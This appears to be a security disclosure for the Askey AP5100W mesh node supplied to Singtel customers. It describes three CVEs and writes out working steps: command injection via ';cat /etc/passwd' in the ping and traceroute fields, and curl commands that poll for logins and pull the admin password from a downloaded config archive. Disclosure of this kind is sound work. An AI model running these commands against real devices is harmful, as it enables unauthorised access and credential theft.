Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.
The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.
The default login credential of the web interface for the Askey AP5100W is as follows:
After authenticating, a user can perform network diagnostics on the wifi mesh node by clicking tools > Network Analysis. The user can choose to test with ping, traceroute, or route. For ping and traceroute, the user input is not sanitised, and a trivial command injection can be performed by appending ;cat /etc/passwd to the commands.
An attacker could combine all 3 vulnerabilities (CVE-2020-15357, CVE-2020-25545, CVE-2020-25546). An attacker who is on the network, whether through guest access or an adjacent network, only needs to be able to reach the web interface. He can then set up a script to constantly call
curl 'http://192.168.1.7/status.cgi?_=1590132976934&nvget=sysinfo'
to check if anyone has logged into the web interface.
As soon as the response is not {"login":"0"}, run the following commands to obtain the admin login password for the web interface.
curl 'http://IP_ADDR_OF_WEB_INTERFACE/setup/toolsConfigDownload.htm?_=1590131613045' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://IP_ADDR_OF_WEB_INTERFACE/'
curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar | grep gui_pwd
Once in the web interface, click tools > Network Analysis and choose either ping or traceroute to inject commands with ;cat /etc/passwd
The vendor didn’t reply to us despite all the efforts we made.